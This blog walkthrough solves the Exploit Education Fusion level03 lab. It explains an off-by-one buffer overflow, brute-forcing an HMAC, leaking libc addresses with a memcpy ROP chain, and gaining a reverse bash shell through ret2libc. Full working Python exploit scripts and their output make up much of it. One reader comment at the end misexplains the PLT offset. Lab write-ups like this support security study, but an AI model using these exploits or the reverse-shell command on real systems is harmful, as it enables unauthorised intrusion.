Exploit Education | Fusion | Level 03 Solution

This level introduces partial hash collisions (hashcash) and more stack corruption.

The description and source code can be found here:
http://exploit.education/fusion/level03/

This level is similar to the last level with added complexity in figuring out how to overflow the buffer. Also, I learned a new ret2libc technique here as I couldn’t figure out how to leak a libc address.

Source Code Analysis

This was one of the most difficult challenges I’ve faced in just learning how the program works. When connecting to the machine with netcat, you just get a token:

andrew ~ $ nc fusion 20003
"// 192.168.56.101:33316-1583172362-239218924-1215732487-2090921930"

I had no idea what to do next, so I turned to the source code. I usually go through each function of the program, show the code, and describe what’s happening. For this level, however, I’ll just give a brief overview of what each function does. There are 6 main functions called by main():

send_token()

A token is generated based on the client’s IP/source port, date & time, and 3 additional random values. That token is then sent to the client. The specifics of how the token is generated don’t really matter. Later, we’ll see that it’s used as the key when generating an HMAC (hash-based message authentication code).

read_request()

This function just listens for a new “request” from the client and saves it to the gRequest global variable. It also closes the connection the client has to the server, making it difficult to leak libc’s address.

validate_request()

This is where things start getting interesting. First, it checks to make sure the first part of the client’s request equals the token that was provided. Next, it produces an HMAC from the token and the message received from the client. An HMAC is essentially a hash of a message and a key. It’s a bit more complicated than that, but we don’t need to know the details for this. Finally, the function does a bitwise OR operation on the first 2 bytes of the resulting hash. If the result is anything other than 0, then the program exits. What this tells us is that all bits in the first 2 bytes of the hash must be 0.
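To make the check concrete, here is a minimal Python sketch of what validate_request() appears to require, based on the description above and on the scripts later in this post: HMAC-SHA1 keyed with the token, computed over the whole request. The function names, the sample token, and the counter-in-the-title approach are my own illustration, not taken from the level's source.

```python
import hashlib
import hmac
from itertools import count


def passes_check(token: bytes, request: bytes) -> bool:
    """Model of the check: HMAC-SHA1 over the full request, keyed with the token."""
    digest = hmac.new(token, request, hashlib.sha1).digest()
    # OR-ing the first two bytes gives 0 only if every bit in both bytes is 0.
    return (digest[0] | digest[1]) == 0


def find_valid_request(token: bytes) -> bytes:
    """Vary a counter inside the title until the HMAC starts with two zero bytes."""
    for n in count():
        request = token + b'\n{"title": "' + str(n).encode() + b'"}'
        if passes_check(token, request):
            return request


if __name__ == "__main__":
    # Hypothetical token, shaped like the ones the server sends.
    sample_token = b"// 127.0.0.1:1234-1-2-3-4"
    print(find_valid_request(sample_token))
```

Since 16 bits must be zero, roughly 1 in 65,536 candidates passes, which is why a brute-force loop finishes within seconds.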

parse_request()

Whatever JSON is included in the client’s request is parsed and saved to a JSON object.

handle_request()

A “foreach” loop iterates over each of the JSON items: tags, title, contents, and serverip. Global variables called gTitle, gContents, and gServerIP are populated from these JSON items. Let’s focus on the title, as that’s where I’ll be overflowing the buffer. Before the global variable gTitle is populated, a local variable called title, with 128 bytes of buffer space, is filled. Another function, decode_string(), is called on the user-supplied input and saves the “decoded” title to the local title variable.

decode_string()

This function essentially walks through the user input, looking for “escaped” characters and replacing them with the actual bytes they’re associated with. For instance, if a user wanted a newline character in the “Title” field, they would use “\n” to represent it. If this function sees that, it’s replaced with a 0x0a byte for when the “blog post” is actually sent. The kicker here is that the while loop used for iterating through the user’s input will only break if the iterator’s address equals the address of the end of the buffer, NOT if it’s greater than or equal to it. AND when a “\u” is detected, two bytes are written, so the iterator is incremented twice! Let’s look at the important parts of this code:

while (*src && dest != end) {
    if (*src == '\\') {
        *src++;
        switch (*src) {
            ...
            case 'u':
                ...
                *dest++ = (what >> 8) & 0xff;
                *dest++ = (what & 0xff);
        }...
    }...
}

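This means that if a “\u” escape is decoded once 127 bytes have been written, its two-byte write carries “dest” from one byte before “end” to one byte past it. The iterator never equals “end,” so the loop keeps going and we can continue writing beyond the buffer.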
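The skipped boundary is easier to see in a toy model. The following Python sketch imitates only the two behaviours that matter here (plain bytes and “\uXXXX” escapes) and assumes “end” sits 128 bytes past the start of the buffer, as described above. It is a simplified stand-in, not a port of the real decode_string().

```python
def decode_string(src: bytes, size: int = 128) -> bytes:
    """Toy model of the loop: it stops only when dest lands exactly on end."""
    out = bytearray()  # len(out) plays the role of (dest - start)
    i = 0
    while i < len(src) and len(out) != size:  # mirrors `dest != end`
        if src[i:i + 2] == b"\\u":
            what = int(src[i + 2:i + 6], 16)  # four hex digits after \u
            out.append((what >> 8) & 0xFF)    # first write
            out.append(what & 0xFF)           # second write, no check in between
            i += 6
        else:
            out.append(src[i])
            i += 1
    return bytes(out)


if __name__ == "__main__":
    print(len(decode_string(b"A" * 200)))                          # stops at 128
    print(len(decode_string(b"A" * 127 + b"\\uAAAA" + b"B" * 40)))  # runs past 128
```

With 127 plain bytes followed by a “\u” escape, the length jumps from 127 to 129 and the `!=` test never fires again, so everything after the escape is copied too.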

post_blog_article()

Finally, the actual HTTP POST request is created. This includes the title and content supplied by the user and completely ignores the tags. The request is sent to the IP address and port provided in the “serverip” field of the JSON object.

Interacting With The Program

Now that we understand how the program works, we can write a Python script to interact with it. Because I need the first 2 bytes of the hashed request to equal 0, I’ll need the script to randomize part of the request, check the hash, and try again if it’s not correct.

#!/usr/bin/env python3

import random, string, hmac
from json import dumps
from hashlib import sha1
from pwn import *


def random_string(size=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=size))


io = remote('fusion', 20003)
token = io.recvline().decode().split('"')[1]
log.info(f"Token: {token}")
print()

while (True):
    title = random_string(20)
    msg = dumps({"tags": ["a"],
                 "title": title,
                 "contents": "Blog post",
                 "serverip": "192.168.56.101:8080"})
    payload = token + "\n" + msg
    hashed = hmac.new(token.encode(), payload.encode(), sha1)

    if hashed.hexdigest()[:4] == "0000":
        log.info("Payload:")
        print(payload)
        log.info(f"Hash: {hashed.hexdigest()}")
        break

print()
io.send(payload)
log.info("Payload sent!")
io.close()

I’ll start a netcat listener in another terminal, using $ nc -nlp 8080, to catch the HTTP request sent by the server. Then I’ll execute the script. It usually doesn’t take more than a few seconds to get a valid hash:

andrew ~/fusion/level03 $ ./level03_test.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: // 192.168.56.101:33472-1583260929-960947877-723786-166326360

[*] Payload:
// 192.168.56.101:33472-1583260929-960947877-723786-166326360
{"tags": ["a"], "title": "lJRt7ir2wwBTVy2zPkcZ", "contents": "Blog post", "serverip": "192.168.56.101:8080"}
[*] Hash: 0000938f4ddb78f027478fbf50e3575758e08b0d

[*] Payload sent!
[*] Closed connection to fusion port 20003

And the netcat listener caught the HTTP request sent by the server:

andrew ~ $ nc -nlp 8080
POST /blog/post HTTP/1.1
Connection: close
Host: 192.168.56.101:8080
Content-Length: 33

lJRt7ir2wwBTVy2zPkcZ
Blog post

Leaking Libc Address

The next thing to do is to figure out how we can leak some libc addresses. This part took me a long time to figure out after a LOT of trial and error. One thing that makes this level difficult is that the program closes stdin, stdout, and stderr in the read_request() function. I did manage to figure out how to overwrite a global variable with a GOT address using memcpy(). Here, I’ll be overwriting the “gTitle” variable with the address of the GOT entry for __libc_start_main. First, I’ll need to get a few addresses:

andrew ~/fusion/level03 $ objdump -d level03 | grep -A1 "__libc_start_main@plt>:"
08048d80 <__libc_start_main@plt>:
 8048d80:       ff 25 2c bd 04 08       jmp    *0x804bd2c

andrew ~/fusion/level03 $ rabin2 -s level03 | egrep 'memcpy|post_blog_article|gTitle$'
100  0x00001f20 0x08049f20 GLOBAL FUNC   745      post_blog_article
132  ---------- 0x0804be04 GLOBAL OBJ    4        gTitle
39   0x00000e60 0x08048e60 GLOBAL FUNC   16       imp.memcpy

If you haven’t noticed, I copied the binary to my attacking machine, which has a few more tools than the Fusion VM, such as ropper and radare2. Anyway, I’ll use the address 0x08048d82 as memcpy()’s source argument. That address is 2 bytes into the PLT stub, just past the ff 25 opcode, where the jmp instruction’s operand is stored: the bytes 2c bd 04 08, i.e. 0x0804bd2c, the address of the GOT entry. I need a pointer to the GOT entry’s address rather than the address itself because memcpy() doesn’t copy the value 0x08048d82; it copies the 4 bytes stored there. That makes “gTitle” point at the GOT entry, so when the contents of “gTitle” are sent back to me, I receive what the GOT entry holds, which is the location of the function in libc.
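As a quick sanity check on where that address comes from, this short Python snippet decodes the six stub bytes from the objdump output above. The variable names are just for illustration.

```python
import struct

# Bytes of the __libc_start_main@plt stub, as printed by objdump at 0x08048d80.
stub_addr = 0x08048D80
stub = bytes.fromhex("ff252cbd0408")

# ff 25 is the two-byte opcode of the indirect jmp; the next four bytes are
# its little-endian operand, which is the address of the GOT entry.
operand_addr = stub_addr + 2
(got_entry,) = struct.unpack("<I", stub[2:6])

print(hex(operand_addr))  # 0x8048d82
print(hex(got_entry))     # 0x804bd2c
```

So 0x08048d82 is simply a place in the binary that already contains the bytes of the GOT entry’s address, which is exactly what memcpy() needs as its source.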

My ROP chain should look like this:

0x08048e60:  Address of memcpy@plt
0x08049f20:  Address of post_blog_article() (function to return to)
0x0804be04:  Address of gTitle variable (where to write to)
0x08048d82:  Address of __libc_start_main@got address (what to write)
       0x4:  How many bytes to write

One thing to note, I ran the first script I created (the one to simply interact with the server) while having GDB attached to the process so I could debug it. The 4-byte location on the stack where that 0x4 value needs to go is already zeroed out. What luck! If I were to attempt to send any null bytes as a part of my ROP chain, the whole thing simply wouldn’t work. This way, I’m able to just end my ROP chain with 0x4 and nothing else after that is required.
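Here is a small standalone sketch of that chain, packed with the standard library instead of pwntools so it can be run anywhere. It also checks the chain against the two bytes I treat as bad characters in this post (0x00 and 0x5c). The helper name p32 mirrors pwntools’ function, but this version is my own one-liner.

```python
import struct

BAD_BYTES = {0x00, 0x5C}  # null and backslash


def p32(value: int) -> bytes:
    """Pack a 32-bit value as little-endian, like pwntools' p32()."""
    return struct.pack("<I", value)


chain = b"".join([
    p32(0x08048E60),  # memcpy@plt
    p32(0x08049F20),  # post_blog_article(), where memcpy() returns to
    p32(0x0804BE04),  # dest: gTitle
    p32(0x08048D82),  # src: location holding the GOT entry's address
    b"\x04",          # low byte of n; the upper three bytes are already zero
])

bad = [hex(b) for b in chain if b in BAD_BYTES]
print(chain.hex(), bad)
```

The last argument is sent as a single byte on purpose: a full p32(4) would contain three null bytes, so the chain relies on the zeros that are already on the stack.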

This time, I catch the server’s response in the same script instead of using a netcat listener. With netcat, I’d have to manually find the leaked address and reverse the bytes (I would use $ nc -nlp 8080 | xxd to see non-printable characters). I wanted all of that automated to remove any room for error, and pwntools makes that possible by letting you create a listener:

#!/usr/bin/env python3

import random, string, hmac
from hashlib import sha1
from pwn import *


def random_string(size=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=size))


io = remote('fusion', 20003)
token = io.recvline().decode().split('"')[1].encode()
log.info(f"Token: {token}")

while (True):
    # Bad chars: 0x00 & 0x5c (backslash)
    title  = random_string(127).encode()
    title += b"\\\\u" + b"A"*35  # two backslashes + u; avoids Python's invalid-escape warning
    title += p32(0x08048e60)  # Address of memcpy@plt
    title += p32(0x08049f20)  # Address of post_blog_article() function (to return to)
    title += p32(0x0804be04)  # Address of gTitle (Where to write to)
    title += p32(0x08048d82)  # Address of __libc_start_main@got address (What to write)
    title += b"\x04"          # How many bytes to write

    payload  = token
    payload += b'\x0a'
    payload += b'{"tags": ["a"], "title": "'
    payload += title
    payload += b'", "contents": "", "serverip": "192.168.56.101:8080"}'

    hashed = hmac.new(token, payload, sha1)
    if hashed.hexdigest()[:4] == "0000":
        log.info(f"Valid hash found: {hashed.hexdigest()}")
        break

l = listen(8080)
log.info("Sending payload...")
io.send(payload)
io.close()
l.wait_for_connection()
print()
log.success(f"Leaked address for __libc_start_main(): {hex(u32(l.recv()[95:99]))}")

andrew ~/fusion/level03 $ ./level03_leak.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: b'// 192.168.56.101:40380-1583430479-1858822997-1207724749-568489767'
[*] Valid hash found: 0000f46d11328fb9a4ada2006758e4c155769abe
[+] Trying to bind to 0.0.0.0 on port 8080: Done
[+] Waiting for connections on 0.0.0.0:8080: Got connection from 192.168.56.102 on port 53805
[*] Sending payload...
[*] Closed connection to fusion port 20003

[+] Leaked address for __libc_start_main(): 0xb74cc020

In my previous post for the Level 02 Solution, I mentioned a handy tool that can help you find out which version of libc your target machine is running. It’s called libc-database. It allows us to supply it with a libc function name and the last 3 hex characters from its leaked address in order to get the right binary. You can even supply it with 2 functions and their offsets for increased accuracy if you get more than 1 hit.
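The reason 3 hex characters are enough is that ASLR shifts libraries by whole pages (4 KiB), so the low 12 bits of a function’s address always match the low 12 bits of its offset inside the libc file. A tiny sketch, using the two addresses leaked in this post (the helper name is made up):

```python
def low12(addr: int) -> str:
    """Return the last three hex digits of an address (its offset within a page)."""
    return format(addr & 0xFFF, "03x")


print(low12(0xB74CC020))  # __libc_start_main leak -> 020
print(low12(0xB7573B60))  # open leak -> b60
```

Those are the values passed to ./find in the commands that follow.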

I’m going to use this tool to make this scenario as realistic as possible. We’re attacking a remote machine and we have a copy of the vulnerable binary, but no idea as to which version of libc is used. That makes it a bit difficult to use a ret2libc attack on a system with ASLR enabled. Sure, we could brute force our way to success on this x86 system, but that’d be quite difficult on an x64 system. Now that I’ve leaked the libc address of one of the libc functions, I can use the libc-database tool to find out which version the target VM is running:

andrew ~/libc-database (master) $ ./find __libc_start_main 020
archive-old-eglibc (id libc6_2.13-20ubuntu5.2_i386)
archive-old-eglibc (id libc6_2.13-20ubuntu5.3_i386)
archive-old-eglibc (id libc6_2.13-20ubuntu5_i386)

It looks like there are 3 possibilities. That means I’ll need to leak another address to add to the search. Note: There are a couple of functions that did not work properly with this method, such as srand(). For some reason, I never got a response from the server when trying to leak them. However, it looks like open() will work. First, I’ll need to get the location of the GOT address:

andrew ~/fusion/level03 $ objdump -d level03 | grep -A1 "open@plt>:"
08048c30 <open@plt>:
 8048c30:       ff 25 d8 bc 04 08       jmp    *0x804bcd8

Next, I just need to modify my script a bit. I modified the ROP chain in line 23 to show:

title += p32(0x08048c32)  # Address of open@got address (What to write)

Now I can leak the address of open():

andrew ~/fusion/level03 $ ./level03_leak.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: b'// 192.168.56.101:40384-1583430893-1722808803-851397042-1284999612'
[*] Valid hash found: 0000738e3f3a55e3535d85f1c9c0de8e8fd04717
[+] Trying to bind to 0.0.0.0 on port 8080: Done
[+] Waiting for connections on 0.0.0.0:8080: Got connection from 192.168.56.102 on port 53806
[*] Sending payload...
[*] Closed connection to fusion port 20003

[+] Leaked address for open(): 0xb7573b60

I can now search the libc database for both values:

andrew ~/libc-database (master) $ ./find __libc_start_main 020 open b60
archive-old-eglibc (id libc6_2.13-20ubuntu5_i386)

Nice! From this, I can calculate the memory address of system() and exit(). First, I’ll need to find some offsets:

andrew ~/libc-database (master) $ rabin2 -s db/libc6_2.13-20ubuntu5_i386.so | egrep ' system$| open$| exit$'
135   0x000329e0 0x000329e0 GLOBAL FUNC   45        exit
1409  0x0003cb20 0x0003cb20 WEAK   FUNC   139       system
1763  0x000c0b60 0x000c0b60 WEAK   FUNC   128       open

I know that open() is at 0xb7573b60, so let’s do some math:

open addr  - open offset = libc addr
0xb7573b60 - 0x000c0b60  = 0xb74b3000

libc addr  + system offset = system addr
0xb74b3000 +  0x0003cb20   = 0xb74efb20

libc addr  + exit offset = exit addr
0xb74b3000 + 0x000329e0  = 0xb74e59e0
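The same arithmetic as a short Python check, using the leaked open() address and the offsets from the rabin2 output above. The page-alignment assertion is a cheap way to catch a wrong libc guess.

```python
OPEN_LEAK = 0xB7573B60

# Offsets from libc6_2.13-20ubuntu5_i386.so, as listed by rabin2.
OFFSETS = {
    "open": 0x000C0B60,
    "system": 0x0003CB20,
    "exit": 0x000329E0,
}

libc_base = OPEN_LEAK - OFFSETS["open"]
assert libc_base & 0xFFF == 0, "libc base should be page-aligned"

system_addr = libc_base + OFFSETS["system"]
exit_addr = libc_base + OFFSETS["exit"]

print(hex(libc_base), hex(system_addr), hex(exit_addr))
```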

Exploitation

I’m also going to need to get the server to open a new connection to the attacking machine since the server closes stdin, stdout, and stderr before this ROP chain is executed. When calling system(), I’ll create a reverse Bash shell with the following string, /bin/bash -i >& /dev/tcp/192.168.56.101/8080 0>&1, placed into the “gContents” variable. I can’t just use the address of “gContents” in my ROP chain since that actually points to another address, the actual string, which is saved in the heap. And of course, heap space is randomized with ASLR. So now, I’ll also need to leak the address that the “gContents” variable points to.

I need to find the address for this variable:

andrew ~/fusion/level03 $ rabin2 -s level03 | grep gContents$
90   ---------- 0x0804bdf4 GLOBAL OBJ    4        gContents

However, I can’t just pass that address to memcpy() as the source. As with the GOT leak, I need a location in the binary that contains that address:

andrew ~/fusion/level03 $ objdump -d level03 | grep 804bdf4
 8049ef4:       a3 f4 bd 04 08          mov    %eax,0x804bdf4
 8049f35:       8b 15 f4 bd 04 08       mov    0x804bdf4,%edx
 804a059:       8b 15 f4 bd 04 08       mov    0x804bdf4,%edx

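I can use the address 0x08049f37, which is 2 bytes into the instruction at 0x08049f35, where its operand (0x0804bdf4) is stored. I tried the first result and for some reason the leak didn’t work. (Note that the first instruction has a 1-byte opcode, a3, so its operand sits at 0x08049ef5, an offset of 1 rather than 2.) Again, I’ll modify line 23 of my level03_leak.py script: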

title += p32(0x08049f37)  # Address of gContents address (What to write)

Now, after some trial and error, I realized that adding data to the “contents” field in the JSON object changes the heap address that “gContents” points to. So I calculated the length of my reverse shell string (49 bytes) and put 49 A’s in that field so the leak run matches the final exploit, as such:

payload += b'", "contents": "' + b'A'*49
payload += b'", "serverip": "192.168.56.101:8080"}'
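Rather than counting by hand, the placeholder can be derived from the command itself. This is only a sketch of the idea; the variable names are mine, and it assumes (as I observed above) that keeping the “contents” length identical between the leak run and the exploit run keeps the heap address the same.

```python
# The reverse shell command that will go into "contents" in the final exploit.
cmd = b"/bin/bash -i >& /dev/tcp/192.168.56.101/8080 0>&1"

# Same-length filler for the leak run.
placeholder = b"A" * len(cmd)

print(len(cmd))  # 49
```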

Running that will get me the leaked address:

andrew ~/fusion/level03 $ ./level03_leak.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: b'// 192.168.56.101:40400-1583433168-986885746-896451877-843201424'
[*] Valid hash found: 0000772700252331533aa0d58750a2f3ba990740
[+] Trying to bind to 0.0.0.0 on port 8080: Done
[+] Waiting for connections on 0.0.0.0:8080: Got connection from 192.168.56.102 on port 53807
[*] Sending payload...
[*] Closed connection to fusion port 20003

[+] Leaked address for gContents: 0x83a8690

Great! Now I can build my final exploit script. Some minor modifications to the level03_leak.py script should do the trick:

#!/usr/bin/env python3

import random, string, hmac
from hashlib import sha1
from pwn import *


def random_string(size=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=size))


io = remote('fusion', 20003)
token = io.recvline().decode().split('"')[1].encode()
log.info(f"Token: {token}")

while (True):
    # Bad chars: 0x00 & 0x5c (backslash)
    title  = random_string(127).encode()
    title += b"\\\\u" + b"A"*35  # two backslashes + u; avoids Python's invalid-escape warning
    title += p32(0xb74efb20)  # Address of system@libc
    title += p32(0xb74e59e0)  # Address of exit@libc
    title += p32(0x083a8690)  # Address of reverse shell string @ gContents

    contents = b'/bin/bash -i >& /dev/tcp/192.168.56.101/8080 0>&1'

    payload  = token
    payload += b'\x0a'
    payload += b'{"tags": ["a"], "title": "'
    payload += title
    payload += b'", "contents": "' + contents
    payload += b'", "serverip": "192.168.56.101:8080"}'

    hashed = hmac.new(token, payload, sha1)
    if hashed.hexdigest()[:4] == "0000":
        log.info(f"Valid hash found: {hashed.hexdigest()}")
        break

r = listen(8080)
io.send(payload)
io.close()
r.wait_for_connection()
print()
r.interactive()

Let’s run it:

andrew ~/fusion/level03 $ ./level03_system.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: b'// 192.168.56.101:40368-1583429614-431280295-283298453-2132779236'
[*] Valid hash found: 000012ec96d4ac85bd57ecfaa1dbfbd7bcbefbaa
[+] Trying to bind to 0.0.0.0 on port 8080: Done
[+] Waiting for connections on 0.0.0.0:8080: Got connection from 192.168.56.102 on port 53802
[*] Closed connection to fusion port 20003

[*] Switching to interactive mode
bash: no job control in this shell
groups: cannot find name for group ID 20003
I have no name!@fusion:/$ $ id
id
uid=20003 gid=20003 groups=20003

5 thoughts on “Exploit Education | Fusion | Level 03 Solution”

  1. x90slide says:

    Thanks for this! Thanks to your writeups, these challenges are a lot more approachable and I’ve learned a lot!

  2. Dave says:

    I wonder why it begins at address 0x08048d82
    because GDB shows it’s 08048d80
    which points to *0x804bd2c
    why add +2?

    1. Dave says:

      When the dynamic linker needs to resolve a symbol, it first checks the GOT for the address of the symbol. If the address is not yet resolved, the linker uses the value at the symbol’s PLT entry as the address of the function to call, which will trigger the resolution process.

      In many systems, the first entry in the PLT is a small trampoline stub that jumps to the dynamic linker’s resolution function, which then returns the address of the actual symbol implementation. This trampoline stub is often located at the address of the symbol’s PLT entry + 0x2.
